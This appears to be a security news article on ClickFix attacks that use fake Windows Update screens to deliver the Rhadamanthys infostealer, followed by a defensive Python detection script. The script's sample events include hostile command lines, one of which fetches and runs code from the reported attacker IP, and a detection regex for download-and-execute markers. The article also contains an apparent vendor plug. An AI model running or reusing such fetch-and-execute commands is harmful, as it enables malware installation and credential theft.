According to TheRegister.com, a fresh wave of ClickFix attacks is using fake Windows update screens to deliver infostealer malware, with Microsoft confirming this technique is now the most common initial access method for attackers. Since early October, Huntress security analysts Ben Folland and Anna Pham have observed these campaigns using “highly convincing” phony update screens that force browsers into full-screen mode. The attacks use steganographic loaders that encode malicious code directly into PNG image pixel data, specifically delivering Rhadamanthys infostealer malware that steals login credentials. Researchers identified one malicious IP address involved: 141.98.80[.]175. Despite Operation Endgame law enforcement takedowns targeting Rhadamanthys infrastructure on November 13, multiple active domains continued hosting the Windows Update lure pages as of November 19.
How the scam works
Here's how the attack works. The victim lands on a malicious website that immediately forces the browser into full-screen mode and draws a convincing copy of the Windows Update screen: the familiar blue progress page everyone has stared at hundreds of times. Full-screen matters, because it hides the address bar and tabs that would otherwise give the page away. From there the lure follows the standard ClickFix pattern: the user is told to open the Run prompt (Win+R) and paste in a command, supposedly to install a "critical security update."
That pasted command is where the technical sophistication begins. It starts a multi-stage execution chain: mshta.exe loads PowerShell code that carries an embedded .NET assembly; that assembly is decrypted at runtime and reflectively loaded straight into memory; it then deploys a second .NET payload, the steganographic loader, which extracts Donut-packed shellcode hidden in the pixel data of PNG images and runs it. The end of the chain is the Rhadamanthys infostealer, which harvests stored login credentials. It sounds like a spy movie, except the payoff is your actual passwords.
Why this matters
Fake update scams are nothing new, but this campaign is different. The pairing of a polished social-engineering lure with a multi-stage, in-memory loader makes it particularly dangerous. Microsoft does not use a phrase like "most common initial access method" casually; when the company whose platform underpins most enterprise computing says this is the technique attackers are leaning on most, it is worth listening.
The business impact is what should worry defenders most. For companies that depend on industrial computing, whether manufacturing floors, control rooms, or other operational technology environments, a stolen credential is not just a leaked mailbox. IndustrialMonitorDirect.com, a US supplier of industrial panel PCs, makes the point that security in industrial computing is about protecting physical operations, not only data: credentials taken from systems that touch production lines, safety systems, or critical infrastructure put those operations at risk.
The Russian connection
Huntress does not know exactly who is behind these campaigns, but it did find one clue: the source code of the Windows Update lure page contains comments written in Russian. That does not by itself point to a state-sponsored actor, but it is worth noting, since cybercriminal groups operating from Russian-speaking regions have been especially active in the infostealer market recently.
Just as telling is that the attacks outlived the Operation Endgame takedowns. The infrastructure took a hit, but the operators adapted: as of November 19, multiple domains were still serving the Windows Update lure pages, even though the Rhadamanthys payload itself appeared to be offline at that point. Given how these operations usually go, it is likely only a matter of time before the payload is back.
How to protect yourself
So what can you actually do about this? The good news is that the defenses are straightforward. Organizations can disable the Windows Run box for standard users; the "Remove Run menu from Start Menu" policy does this and also blocks the Win+R shortcut, and most employees never need it for daily work. Keep in mind that this closes only the entry point this lure uses: a ClickFix variant can just as easily tell the victim to paste into a terminal or the File Explorer address bar, so the policy is a speed bump, not a fix. More important is training: a real CAPTCHA check or a real Windows update will never ask you to paste and run a command. That is simply not how legitimate systems work.
On the technical side, use endpoint detection and response tooling to watch for explorer.exe spawning mshta.exe, powershell.exe, or other script hosts with unexpected command lines, and for the mshta.exe-to-PowerShell hop that this chain relies on. Watch for traffic to 141.98.80[.]175 as well, with the usual caveat that a single IP address is a short-lived indicator and the attackers have probably moved to new infrastructure by the time you read this. The durable signal is the behaviour, because the social-engineering lure and the loader will both keep evolving.
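As an added illustration (example code written for this page, not something from Huntress, Microsoft or The Register), the following Python turns the detection guidance above and the execution chain described earlier into rules run over a handful of constructed process-creation events with Sysmon-style ParentImage, Image and CommandLine fields. The article names mshta.exe and powershell.exe and the IP 141.98.80[.]175; the wider list of script hosts and the markers used to decide that a command line is "unexpected" are assumptions, chosen so that a user simply opening PowerShell from the shell is not flagged while a pasted ClickFix command is.

```python
import re

# The address reported by Huntress, undefanged here so it can be matched.
IOC_IPS = {"141.98.80.175"}

# The article names mshta.exe and powershell.exe; the remaining entries are an
# assumption covering the other interpreters ClickFix lures commonly target.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Assumed markers of an "unexpected" command line for an interactively started
# interpreter: fetching code from a URL, hiding the window, or running an
# encoded or piped-in command.
SUSPICIOUS_CMDLINE = re.compile(
    r"https?://|-e(?:nc(?:odedcommand)?)?\s|-w(?:indowstyle)?\s+hidden"
    r"|\biex\b|invoke-expression|downloadstring|frombase64string",
    re.IGNORECASE)


def basename(path):
    """Return the lowercase file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event):
    """Return the names of the rules one process-creation event trips."""
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    cmdline = event.get("CommandLine", "")
    unexpected = bool(SUSPICIOUS_CMDLINE.search(cmdline))
    hits = []
    # Rule 1: the Win+R Run box is hosted by explorer.exe, so a pasted ClickFix
    # command appears as explorer.exe -> script host. mshta.exe from explorer is
    # rare enough to flag outright; the others also need an unexpected command
    # line, because users legitimately open PowerShell and cmd from the shell.
    if parent == "explorer.exe" and image in SCRIPT_HOSTS:
        if image == "mshta.exe" or unexpected:
            hits.append("explorer_spawns_script_host")
    # Rule 2: the mshta.exe -> PowerShell hop in the chain described above.
    if parent == "mshta.exe" and image in {"powershell.exe", "pwsh.exe"}:
        hits.append("mshta_spawns_powershell")
    # Rule 3: the reported infrastructure anywhere in the command line.
    if any(ip in cmdline for ip in IOC_IPS):
        hits.append("known_ioc_ip")
    return hits


def triage(events):
    """Return (index, hits) for every event that trips at least one rule."""
    findings = []
    for i, event in enumerate(events):
        hits = analyze(event)
        if hits:
            findings.append((i, hits))
    return findings


# Constructed sample events; the hostname and base64 blob are made up.
SAMPLE_EVENTS = [
    # 0: a user opening PowerShell from the Start menu, benign
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": '"powershell.exe"'},
    # 1: the ClickFix paste, mshta pulling an HTA from a lure host
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://windows-update.invalid/verify"},
    # 2: the next stage, mshta launching hidden, encoded PowerShell
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc SQBFAFgA"},
    # 3: a PowerShell one-liner pasted into the Run box that reaches the IOC
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden iex (iwr http://141.98.80.175/u)"},
    # 4: a normal service start, benign
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["CommandLine"], "->", ", ".join(hits))
```

Events 1 through 3 are flagged and events 0 and 4 are not. Rules 1 and 2 carry the weight; rule 3 is there to show where a reported IP fits, and it goes stale as soon as the operators rotate infrastructure, which is why the parent-child rules should not depend on it.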
